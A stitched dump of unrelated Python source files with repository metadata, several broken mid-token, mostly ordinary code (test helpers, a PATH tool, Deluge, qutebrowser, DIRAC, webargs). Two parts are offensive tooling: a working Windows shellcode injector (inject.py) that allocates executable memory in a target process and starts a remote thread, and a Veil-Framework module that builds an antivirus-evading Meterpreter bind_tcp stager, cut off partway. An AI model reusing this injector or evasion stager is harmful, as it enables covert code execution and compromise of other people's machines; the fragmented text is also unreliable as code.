assert "[ ] \x1b[0mb-ddl.sql" in captured.out
assert "Version 1.3" in captured.out
assert "[ ] \x1b[0mc-ddl.sql" in captured.out
|
Coriolan8/python_traning
|
test/test_add_group.py
|
Python
|
apache-2.0
| 824 | 0.01335 |
# -*- coding: utf-8 -*-
from model.group import Group
def test_add_group(app):
old_groups = app.group.get_group_list()
group = (Group(name="fdsasdaf", header="group", footer="group"))
app.group.create(group)
assert len(old_groups) + 1 == app.group.count()
new_groups = app.group.get_group_list()
old_groups.append(group)
assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
#def test_add_empty_group(a
|
pp):
# old_groups = app.group.get_group_list()
# group = (Group(name="", header="", footer=""))
# app.group.create(group)
# new_groups = app.grou
|
p.get_group_list()
# assert len(old_groups) + 1 == len(new_groups)
# old_groups.append(group)
# assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
|
CSGreater-Developers/HMC-Grader
|
app/userViews/admin/__init__.py
|
Python
|
mit
| 36 | 0 |
# coding=ut
|
f-8
__all__ = ['admin'
|
]
|
jalanb/jab
|
src/python/add_to_a_path.py
|
Python
|
mit
| 3,399 | 0 |
"""Script to display a collection of paths after inserting one new path
Usage:
add_to_a_path.py [-U] PATHS PATH
add_to_a_path.py [-U] (-s | -i INDEX ) PATHS PATH
Options:
-h, --help Show this help and exit
-v, --version
|
Show version number and exit
-s, --start Add the path at start of list of paths
-i INDEX, --index=INDEX The index at which the path will be inserted
Examples of use:
$ export PATH=/bin:/usr/bin
$ add_to_a_path.py PATH /usr/local/bin
PATH=/
|
bin:/usr/bin:/usr/local/bin
$ add_to_a_path.py PATH /usr/local/bin --start
PATH=/usr/local/bin:/bin:/usr/bin
"""
from __future__ import print_function
import os
import sys
import argparse
from bdb import BdbQuit
__version__ = '0.1.0'
class ScriptError(NotImplementedError):
pass
def version():
print('%s %s' % (args, __version__))
raise SystemExit
def parse_args():
"""Parse out command line arguments"""
parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument('symbol', help='The bash symbol to be changed')
parser.add_argument('path', help='The path to be added')
parser.add_argument('-s', '--start', action='store_true',
help='Add the path at start of list of paths')
parser.add_argument('-i', '--index', type=int,
help='The index at which the path will be inserted')
parser.add_argument('-v', '--version', action='store_true',
help='Show version')
args = parser.parse_args()
if args.version:
version()
if not args.index:
if args.start:
args.index = 0
else:
args.index = False
return args
def _add_symbol_to_paths(paths, symbol, i):
if i is False:
i = len(paths)
result = paths[:]
if not symbol:
return result
if symbol not in result:
result.insert(i, symbol)
return result
j = result.index(symbol)
if i != j:
del result[j]
result.insert(i, symbol)
return result
def get_arg_path(args):
path = args.path
if not path:
return ''
user_path = os.path.expanduser(path)
real_path = os.path.realpath(user_path)
if not os.path.isdir(real_path):
return ''
return real_path
def split_paths(string):
if not string:
return []
return [p for p in string.split(os.path.pathsep) if p]
def get_paths(args):
symbol = args.symbol
paths_string = ''
if symbol in os.environ:
paths_string = os.environ[symbol]
elif os.path.pathsep in symbol:
paths_string = symbol
return split_paths(paths_string)
def script(args):
arg_path = get_arg_path(args)
paths = get_paths(args)
if not arg_path:
if not paths:
return False
elif os.path.isdir(arg_path):
if arg_path in paths:
paths.remove(arg_path)
paths = _add_symbol_to_paths(paths, arg_path, args.index)
else:
return False
print('='.join((args.symbol, os.path.pathsep.join(paths))))
return True
def main():
"""Run the script"""
try:
args = parse_args()
return os.EX_OK if script(args) else not os.EX_OK
except (SystemExit, BdbQuit):
pass
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
|
ztane/jaspyx
|
jaspyx/visitor/if_else.py
|
Python
|
mit
| 809 | 0 |
from __future__ import absolute_import, division, print_function
import _ast
from jaspyx.context.block import BlockContext
from jaspyx.visitor import BaseVisitor
class IfElse(BaseVisitor):
def visit_If(self, node, skip_indent=False):
if not skip_indent:
self.indent()
self.output('if(')
self.visit(node.test)
self.output(') ')
self.block(node.body, context=BlockContext(self.stack[-1]))
if node.orelse
|
:
self.output(' else ')
if len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If):
self.visit_If(node.orelse[0], True)
else:
self.block(node.orelse, context=BlockContext(self.stack[-1]))
self.output('\n')
|
else:
self.output('\n')
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/mock_django/signals.py
|
Python
|
agpl-3.0
| 1,028 | 0 |
"""
mock_django.signals
~~~~~~~~~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache Licen
|
se 2.0, see LICENSE for more details.
"""
import contextlib
import mock
@contextlib.contextmanager
def mock_signal_receiver(signal, wraps=None, **kwargs):
"""
Temporarily attaches a receiver to the provided ``signal`` within the scope
of the context manager.
The mocked receiver is returned as the ``as`` target of the ``with``
statement.
To have the mo
|
cked receiver wrap a callable, pass the callable as the
``wraps`` keyword argument. All other keyword arguments provided are passed
through to the signal's ``connect`` method.
>>> with mock_signal_receiver(post_save, sender=Model) as receiver:
>>> Model.objects.create()
>>> assert receiver.call_count = 1
"""
if wraps is None:
def wraps(*args, **kwrags):
return None
receiver = mock.Mock(wraps=wraps)
signal.connect(receiver, **kwargs)
yield receiver
signal.disconnect(receiver)
|
coolbombom/CouchPotatoServer
|
couchpotato/core/notifications/synoindex/main.py
|
Python
|
gpl-3.0
| 1,093 | 0.009149 |
from couchpotato.core.event import addEvent
from couchpotato.core.logger import CPLog
from couchpotato.core.notifications.base import Notification
import os
import subprocess
log = CPLog(__name__)
class Synoindex(Notification):
index_path = '/usr/syno/bin/synoindex'
def __init__(self):
super(Synoindex, self).__init__()
addEvent('renamer.after', self.addToLibrary)
def addToLibrary(self, message = None, gr
|
oup = {}):
if self.isDisabled(): return
command = [self.index_path, '-A', group.get('destination_dir')]
log.info('Executing synoind
|
ex command: %s ', command)
try:
p = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
out = p.communicate()
log.info('Result from synoindex: %s', str(out))
return True
except OSError, e:
log.error('Unable to run synoindex: %s', e)
return False
return True
def test(self, **kwargs):
return {
'success': os.path.isfile(self.index_path)
}
|
laanwj/deluge
|
deluge/ui/common.py
|
Python
|
gpl-3.0
| 13,980 | 0.001431 |
# -*- coding: utf-8 -*-
#
# deluge/ui/common.py
#
# Copyright (C) Damien Churchill 2008-2009 <damoxc@gmail.com>
# Copyright (C) Andrew Resch 2009 <andrewresch@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you
|
modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
"""
The ui common module c
|
ontains methods and classes that are deemed useful for
all the interfaces.
"""
import os
import sys
import urlparse
import locale
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from deluge import bencode
from deluge.common import decode_string, path_join
from deluge.log import LOG as log
import deluge.configmanager
class TorrentInfo(object):
"""
Collects information about a torrent file.
:param filename: The path to the torrent
:type filename: string
"""
def __init__(self, filename, filetree=1):
# Get the torrent data from the torrent file
try:
log.debug("Attempting to open %s.", filename)
self.__m_filedata = open(filename, "rb").read()
self.__m_metadata = bencode.bdecode(self.__m_filedata)
except Exception, e:
log.warning("Unable to open %s: %s", filename, e)
raise e
self.__m_info_hash = sha(bencode.bencode(self.__m_metadata["info"])).hexdigest()
# Get encoding from torrent file if available
self.encoding = "UTF-8"
if "encoding" in self.__m_metadata:
self.encoding = self.__m_metadata["encoding"]
elif "codepage" in self.__m_metadata:
self.encoding = str(self.__m_metadata["codepage"])
# Check if 'name.utf-8' is in the torrent and if not try to decode the string
# using the encoding found.
if "name.utf-8" in self.__m_metadata["info"]:
self.__m_name = decode_string(self.__m_metadata["info"]["name.utf-8"])
else:
self.__m_name = decode_string(self.__m_metadata["info"]["name"], self.encoding)
# Get list of files from torrent info
paths = {}
dirs = {}
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for index, f in enumerate(self.__m_metadata["info"]["files"]):
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
f["index"] = index
paths[path] = f
dirname = os.path.dirname(path)
while dirname:
dirinfo = dirs.setdefault(dirname, {})
dirinfo["length"] = dirinfo.get("length", 0) + f["length"]
dirname = os.path.dirname(dirname)
if filetree == 2:
def walk(path, item):
if item["type"] == "dir":
item.update(dirs[path])
else:
item.update(paths[path])
item["download"] = True
file_tree = FileTree2(paths.keys())
file_tree.walk(walk)
else:
def walk(path, item):
if type(item) is dict:
return item
return [paths[path]["index"], paths[path]["length"], True]
file_tree = FileTree(paths)
file_tree.walk(walk)
self.__m_files_tree = file_tree.get_tree()
else:
if filetree == 2:
self.__m_files_tree = {
"contents": {
self.__m_name: {
"type": "file",
"index": 0,
"length": self.__m_metadata["info"]["length"],
"download": True
}
}
}
else:
self.__m_files_tree = {
self.__m_name: (0, self.__m_metadata["info"]["length"], True)
}
self.__m_files = []
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for f in self.__m_metadata["info"]["files"]:
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
self.__m_files.append({
'path': path,
'size': f["length"],
'download': True
})
else:
self.__m_files.append({
"path": self.__m_name,
"size": self.__m_metadata["info"]["length"],
"download": True
})
def as_dict(self, *keys):
"""
Return the torrent info as a dictionary, only including the passed in
keys.
:param keys: a number of key strings
:type keys: string
"""
return dict([(key, getattr(self, key)) for key in keys])
@property
def name(self):
"""
The name of the torrent.
:rtype: string
"""
return self.__m_name
@property
def info_hash(self):
"""
The torrents info_hash
:rtype: string
"""
return self.__m_info_hash
@property
def files(self):
"""
A list of the files that the torrent contains.
:rtype: list
"""
return self.__m_files
@property
def files_tree(self):
"""
A dictionary based tree of the files.
::
{
"some_directory": {
"some_file": (index, size, download)
}
}
:rtype: dictionary
"""
return self.__m_files_tree
@property
def metadata(self):
"""
The torrents metadata.
:rtype: dictionary
"""
return self.__m_metadata
@property
def filedata(self):
"""
The torrents file data. This will be the bencoded dictionary read
from the torrent file.
:rtype: string
"""
return self.__m_filedata
class FileTree2(object):
"""
Converts a list of paths in to a file tree.
:param paths: The paths to be converted
:type paths: list
"""
def __init__(self, paths):
self.tree = {"contents": {}, "type": "dir"}
def get_parent(path):
parent = self.tree
while "/" in path:
directory, path
|
forkbong/qutebrowser
|
qutebrowser/misc/guiprocess.py
|
Python
|
gpl-3.0
| 6,787 | 0 |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""A QProcess which shows notifications in the GUI."""
import locale
import shlex
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QObject, QProcess,
QProcessEnvironment)
from qutebrowser.utils import message, log, utils
from qutebrowser.browser import qutescheme
class GUIProcess(QObject):
"""An external process which shows notifications in the GUI.
Args:
cmd: The command which was started.
args: A list of arguments which gets passed.
verbose: Whether to show more messages.
_output_messages: Show output as messages.
_started: Whether the underlying process is started.
_proc: The underlying QProcess.
_what: What kind of thing is spawned (process/editor/userscript/...).
Used in messages.
Signals:
error/finished/started signals proxied from QProcess.
"""
error = pyqtSignal(QProcess.ProcessError)
finished = pyqtSignal(int, QProcess.ExitStatus)
started = pyqtSignal()
def __init__(self, what, *, verbose=False, additional_env=None,
output_messages=False, parent=None):
super().__init__(parent)
self._what = what
self.verbose = verbose
self._output_messages = output_messages
self._started = False
self.cmd = None
self.args = None
self._proc = QProcess(self)
self._proc.errorOccurred.connect(self._on_error)
self._proc.errorOccurred.connect(self.error)
self._proc.finished.connect(self._on_finished)
self._proc.finished.connect(self.finished)
self._proc.started.connect(self._on_started)
self._proc.started.connect(self.started)
if additional_env is not None:
procenv = QProcessEnvironment.systemEnvironment()
for k, v in additional_env.items():
procenv.insert(k, v)
self._proc.setProcessEnvironment(procenv)
@pyqtSlot(QProcess.ProcessError)
def _on_error(self, error):
"""Show a message if there was an error while spawning."""
if error == QProcess.Crashed and not utils.is_windows:
# Already handled via ExitStatus in _on_finished
return
msg = self._proc.errorString()
message.error("Error while spawning {}: {}".format(self._what, msg))
@pyqtSlot(int, QProcess.ExitStatus)
def _on_finished(self, code, status):
"""Show a message when the process finished."""
self._started = False
log.procs.debug("Process finished with code {}, status {}.".format(
code, status))
encoding = locale.getpreferredencoding(do_setlocale=False)
stderr = self._proc.readAllStandardError().data().decode(
encoding, 'replace')
stdout = self._proc.readAllStandardOutput().data().decode(
encoding, 'replace')
if self._output_messages:
if stdout:
message.info(stdout.strip())
if stderr:
message.error(stderr.strip())
if status == QProcess.CrashExit:
exitinfo = "{} crashed.".format(self._what.capitalize())
message.error(exitinfo)
elif status == QProcess.NormalExit an
|
d code == 0:
exitinfo = "{} exited successfully.".format(
self._what.capitalize())
if self.verbose:
message.info(exitinfo)
else:
assert status == QProcess.NormalExit
# We call this 'status' here as it makes more sense to the user -
# it's actually 'code'.
exitinfo = ("{} exited with status {}, see :messages for "
"details.").format(self._what.capitaliz
|
e(), code)
message.error(exitinfo)
if stdout:
log.procs.error("Process stdout:\n" + stdout.strip())
if stderr:
log.procs.error("Process stderr:\n" + stderr.strip())
qutescheme.spawn_output = self._spawn_format(exitinfo, stdout, stderr)
def _spawn_format(self, exitinfo, stdout, stderr):
"""Produce a formatted string for spawn output."""
stdout = (stdout or "(No output)").strip()
stderr = (stderr or "(No output)").strip()
spawn_string = ("{}\n"
"\nProcess stdout:\n {}"
"\nProcess stderr:\n {}").format(exitinfo,
stdout, stderr)
return spawn_string
@pyqtSlot()
def _on_started(self):
"""Called when the process started successfully."""
log.procs.debug("Process started.")
assert not self._started
self._started = True
def _pre_start(self, cmd, args):
"""Prepare starting of a QProcess."""
if self._started:
raise ValueError("Trying to start a running QProcess!")
self.cmd = cmd
self.args = args
fake_cmdline = ' '.join(shlex.quote(e) for e in [cmd] + list(args))
log.procs.debug("Executing: {}".format(fake_cmdline))
if self.verbose:
message.info('Executing: ' + fake_cmdline)
def start(self, cmd, args):
"""Convenience wrapper around QProcess::start."""
log.procs.debug("Starting process.")
self._pre_start(cmd, args)
self._proc.start(cmd, args)
self._proc.closeWriteChannel()
def start_detached(self, cmd, args):
"""Convenience wrapper around QProcess::startDetached."""
log.procs.debug("Starting detached.")
self._pre_start(cmd, args)
ok, _pid = self._proc.startDetached(
cmd, args, None) # type: ignore[call-arg]
if not ok:
message.error("Error while spawning {}".format(self._what))
return False
log.procs.debug("Process started.")
self._started = True
return True
def exit_status(self):
return self._proc.exitStatus()
|
idkwim/snippets
|
inject.py
|
Python
|
mit
| 956 | 0.034519 |
#First parameter is path for binary file containing instructions to be injected
#Second parameter is Process Identifier for process to be injected to
import binascii
import sys
from ct
|
ypes import *
if len(sys.argv) < 3:
print("usage inject.py <shellcodefile.bin> <pid>")
sys.exit(1)
file = open(sys.argv[1],'rb')
buff=file.read()
file.close()
print("buffer length = ")
print(len(buff))
print("pid = "+sys.
|
argv[2])
handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2]))
if (handle == 0):
print("handle == 0")
sys.exit(1)
addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40)
if(addr == 0):
print("addr = = 0")
sys.exit(1)
bytes = c_ubyte()
windll.kernel32.WriteProcessMemory(handle, addr , buff, len(buff), byref(bytes))
handle1=windll.kernel32.CreateRemoteThread(handle , 0x0, 0x0 , addr, 0x0,0x0 , 0x0)
if(handle1 == 0):
print("handle1 = = 0");
sys.exit(1)
windll.kernel32.CloseHandle(handle)
|
ic-hep/DIRAC
|
src/DIRAC/Resources/Computing/BatchSystems/TimeLeft/SGEResourceUsage.py
|
Python
|
gpl-3.0
| 4,887 | 0.001432 |
""" The SGE TimeLeft utility interrogates the SGE batch system for the
current CPU consumed, as well as its limit.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os
import re
import time
import socket
from DIRAC import S_OK, S_ERROR
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.TimeLeft import runCommand
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.ResourceUsage import ResourceUsage
class SGEResourceUsage(ResourceUsage):
"""
This is the SGE plugin of the TimeLeft Utility
"""
def __init__(self):
"""Standard constructor"""
super(SGEResourceUsage, self).__init__("SGE", "JOB_ID")
self.queue = os.environ.get("QUEUE")
sgePath = os.environ.get("SGE_BINARY_PATH")
if sgePath:
os.environ["PATH"] += ":" + sgePath
self.log.verbose("JOB_ID=%s, QUEUE=%s" % (self.jobID, self.queue))
self.startTime = time.time()
def getResourceUsage(self):
"""Returns S_OK with a dictionary containing the entries CPU, CPULimit,
WallClock, WallClockLimit, and Unit for current slot.
"""
cmd = "qstat -f -j %s" % (self.jobID)
result = runCommand(cmd)
if not result["OK"]:
return result
cpu = None
cpuLimit = None
wallClock = None
wallClockLimit = None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage.*cpu.*", line):
match = re.search(r"cpu=([\d,:]*),", line)
if match:
cpuList = match.groups()[0].split(":")
try:
newcpu = 0.0
if len(cpuList) == 3:
newcpu = float(cpuList[0]) * 3600 + float(cpuList[1]) * 60 + float(cpuList[2])
elif len(cpuList) == 4:
newcpu = (
float(cpuList[0]) * 24 * 3600
+ float(cpuList[1]) * 3600
+ float(cpuList[2]) * 60
+ float(cpuList[3])
)
if not cpu or newcpu > cpu:
cpu = newcpu
except ValueError:
self.log.warn('Problem parsing "%s" for CPU consumed' % line)
if re.search("hard resource_list.*cpu.*", line):
match = re.search(r"_cpu=(\d*)", line)
if match:
cpuLimit = float(match.groups()[0])
match = re.search(r"_rt=(\d*)", line)
if match:
wallClockLimit = float(match.groups()[0])
else:
self.log.warn("No hard limits found")
# Some SGE batch systems apply CPU scaling factor to the CPU consumption figures
if cpu:
factor = _getCPUScalingFactor()
if factor:
cpu = cpu / factor
consumed = {"CPU": cpu, "CPULimit": cpuLimit, "WallClock": wallClock, "WallClockLimit": wallClockLimit}
if None in consumed.values():
missed = [key for key, val in consumed.items() if val is None]
msg = "Could not determine parameter"
self.log.warn("Could not determine parameter", ",".join(missed))
self.log.debug("This is the stdout from the batch system call\n%s" % (result["Value"]))
else:
self.log.debug("TimeLeft counters complete:", str(consumed))
if cpuLimit or wallClockLimit:
# We have got a partial result from SGE
if not cpuLimit:
# Take some margin
consumed["CPULimit"] = wallClockLimit * 0.8
if not wallClockLimit:
consumed["WallClockLimit"] = cpuLimit / 0.8
if not cpu:
consumed["CPU"] = time.time() - self.startTime
if not wallClock:
consumed["WallClock"] = time.time() - self.startTime
|
self.log.debug("TimeLeft counters restored:", str(consumed))
return S_OK(consumed)
else:
msg = "Could not determine necessary parameters"
self.log.info(msg, ":\nThis is the stdout from the batch system call\n%s" % (result["Value"]))
retVal = S_ERROR(msg)
retVal["Value"] = consumed
return retVal
def _getCPUScalingFactor():
host = socket.getfqdn()
cmd = "qconf -se %s" % host
|
result = runCommand(cmd)
if not result["OK"]:
return None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage_scaling", line):
match = re.search(r"cpu=([\d,\.]*),", line)
if match:
return float(match.groups()[0])
return None
|
daspots/dasapp
|
lib/webargs/fields.py
|
Python
|
mit
| 2,488 | 0.00201 |
# -*- coding: utf-8 -*-
"""Field classes.
Includes all fields from `marshmallow.fields` in addition to a custom
`Nested` field and `DelimitedList`.
All fields can optionally take a special `location` keyword argument, which tells webargs
where to parse the request argument from. ::
args = {
'active': fields.Bool(location='query')
'content_type': fields.Str(load_from='Content-Type',
location='headers')
}
"""
import marshmallow as ma
from webargs.core import argmap2schema
__all__ = [
'Nested',
'DelimitedList',
]
# Expose all fields from marshmallow.fields.
# We do this instead of 'from marshmallow.fields import *' because webargs
# has its own subclass of Nested
for each in (field_name for field_name in ma.fields.__all__ if field_name != 'Nested'):
__all__.append(each)
globals()[each] = getattr(ma.fields, each)
class Nested(ma.fields.Nested):
"""Same as `marshmallow.fields.Nested`, except can be passed a dictionary as
the first argument, which will be converted to a `marshmallow.Schema`.
"""
def __init__(self, nested, *args, **kwargs):
if isinstance(nested, dict):
nested = argmap2schema(nested)
super(Nested, self).__init__(nested, *args, **kwargs)
class DelimitedList(ma.fields.List):
"""Same as `marshmallow.fields.List`, except can load from either a list or
a delimited string (e.g. "foo,bar,baz").
:param Field cls_or_instance: A field class or instance.
:p
|
aram str delimiter: Delimiter between values.
:param bool as_string: Dump values to string.
"""
delimiter = ','
def __init__(self, cls_or_instance, delimiter=None, as_string=False, **kwargs):
self.delimiter = delimiter or self.delimiter
self.as_string = as_string
super(DelimitedList, self).__init__(cls_or_instance, **kwargs)
def _serialize(self, value, attr, obj):
ret = super(DelimitedList, self)._serialize(value, attr, obj)
if self.as_string
|
:
return self.delimiter.join(format(each) for each in value)
return ret
def _deserialize(self, value, attr, data):
try:
ret = (
value
if ma.utils.is_iterable_but_not_string(value)
else value.split(self.delimiter)
)
except AttributeError:
self.fail('invalid')
return super(DelimitedList, self)._deserialize(ret, attr, data)
|
ktan2020/legacy-automation
|
win/Lib/site-packages/wx-3.0-msw/wx/tools/XRCed/undo.py
|
Python
|
mit
| 7,307 | 0.005748 |
# Name: undo.py
# Purpose: XRC editor, undo/redo module
# Author: Roman Rolinsky <rolinsky@mema.ucl.ac.be>
# Created: 01.12.2002
# RCS-ID: $Id: undo.py 54812 2008-07-29 13:39:00Z ROL $
from globals import *
import view
from component import Manager
from model import Model
undo_depth = 10 # max number of undo remembered
# Undo/redo classes
class UndoManager:
# Undo/redo stacks
undo = []
redo = []
def RegisterUndo(self, undoObj):
TRACE('RegisterUndo: %s', undoObj.label)
self.undo.append(undoObj)
while len(self.undo) > undo_depth: self.undo.pop(0)
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def GetUndoLabel(self):
return self.undo[-1].label
def GetRedoLabel(self):
return self.redo[-1].label
def Undo(self):
undoObj = self.undo.pop()
undoObj.undo()
self.redo.append(undoObj)
view.frame.SetStatusText('Undone')
Presenter.setModified()
self.UpdateToolHelp()
def Redo(self):
undoObj = self.redo.pop()
undoObj.redo()
self.undo.append(undoObj)
view.frame.SetStatusText('Redone')
Presenter.setModified()
self.UpdateToolHelp()
def Clear(self):
map(Undo.destroy, self.undo)
self.undo = []
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def CanUndo(self):
return bool(self.undo)
def CanRedo(self):
return bool(self.redo)
def UpdateToolHelp(self):
if g.undoMan.CanUndo():
msg = 'Undo ' + self.GetUndoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_UNDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_UNDO, msg)
if g.undoMan.CanRedo():
msg = 'Redo ' + self.GetRedoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_REDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_REDO, msg)
class Undo:
'''ABC for Undo*.'''
def redo(self): # usually redo is same as undo
self.undo()
def destroy(self):
pass
class UndoCutDelete(Undo):
label = 'cut/delete'
def __init__(self, itemIndex, state, node):
self.itemIndex = itemIndex
self.state = state
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
Presenter.unselect()
# Updating DOM. Find parent node first
parentItem = view.tree.ItemAtFullIndex(self.itemIndex[:-1])
parentNode = view.tree.GetPyData(parentItem)
parentComp = Manager.getNodeComp(parentNode)
nextItem = view.tree.ItemAtFullIndex(self.itemIndex)
if nextItem:
nextNode = parentComp.getTreeOrImplicitNode(view.tree.GetPyData(nextItem))
else:
nextNode = None
# Insert before next
parentNode.insertBefore(self.node, nextNode)
# Remember test window item
if view.testWin.item is not None:
testItemIndex = view.tree.ItemFullIndex(view.testWin.item)
# Update tree and presenter
view.tree.FlushSubtree(parentItem, parentNode)
view.tree.SetFullState(self.state)
# Restore test window item
if view.testWin.item is not None:
view.testWin.item = view.tree.ItemAtFullIndex(testItemIndex)
item = view.tree.ItemAtFullIndex(self.itemIndex)
view.tree.EnsureVisible(item)
# This will generate events
view.tree.SelectItem(item)
def redo(self):
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
self.node = Presenter.delete(item)
# Undoing paste/create is the opposite of cut/delete, so we can reuse
# UndoCutDelete class swapping undo<->redo
class UndoPasteCreate(UndoCutDelete):
label = 'paste/create'
# The ctor is different because node is not known initially
def __init__(self, itemIndex, state):
self.itemIndex = itemIndex # new item index
self.state = state # tree state
self.node = None
undo = UndoCutDelete.redo
redo = UndoCutDelete.undo
class UndoReplace(Undo):
label = 'replace'
def __init__(self, itemIndex, co
|
mp, node):
self.itemIndex = itemIndex
self.comp = comp
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
# Replace current node with old node
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
comp = self.comp
no
|
de = self.node
data = wx.TreeItemData(node)
parentItem = view.tree.GetItemParent(item)
parentNode = view.tree.GetPyData(parentItem)
self.node = view.tree.GetPyData(item)
self.comp = Presenter.comp
Presenter.container.replaceChild(parentNode, node, self.node)
# Replace tree item: insert new, remove old
label = comp.getTreeText(node)
imageId = comp.getTreeImageId(node)
item = view.tree.InsertItem(parentItem, item, label, imageId, data=data)
view.tree.Delete(view.tree.GetPrevSibling(item))
Presenter.item = item
# Add children
for n in filter(is_object, node.childNodes):
view.tree.AddNode(item, comp.getTreeNode(n))
view.tree.EnsureVisible(item)
# Update panel
view.tree.SelectItem(item)
Presenter.setModified()
class UndoEdit(Undo):
'''Undo class for using in AttributePanel.'''
label = 'edit'
def __init__(self, item, page):
self.index = view.tree.ItemFullIndex(item)
self.page = page
panel = view.panel.nb.GetPage(page).panel
self.values = panel.GetValues()
def undo(self):
# Go back to the previous item
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.index)
Presenter.setData(item)
panel = view.panel.nb.GetPage(self.page).panel
values = panel.GetValues()
panel.SetValues(self.values)
Presenter.update(item)
self.values = values
view.tree.SelectItem(item)
class UndoGlobal(Undo):
'''Undo class storing a copy of the complete tree. Can be used for
non-frequent operations to avoid programming special undo
classes.'''
label = 'global'
def __init__(self):
self.mainNode = Model.mainNode.cloneNode(True)
self.state = view.tree.GetFullState()
def destroy(self):
self.mainNode.unlink()
def undo(self):
# Exchange
Model.mainNode,self.mainNode = \
self.mainNode,Model.dom.replaceChild(self.mainNode, Model.mainNode)
# Replace testElem
Model.testElem = Model.mainNode.childNodes[0]
state = view.tree.GetFullState()
Presenter.flushSubtree()
view.tree.SetFullState(self.state)
self.state = state
def redo(self):
self.undo()
Presenter.unselect()
|
Veil-Framework/Veil
|
tools/evasion/payloads/python/meterpreter/bind_tcp.py
|
Python
|
gpl-3.0
| 6,026 | 0.009459 |
"""
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
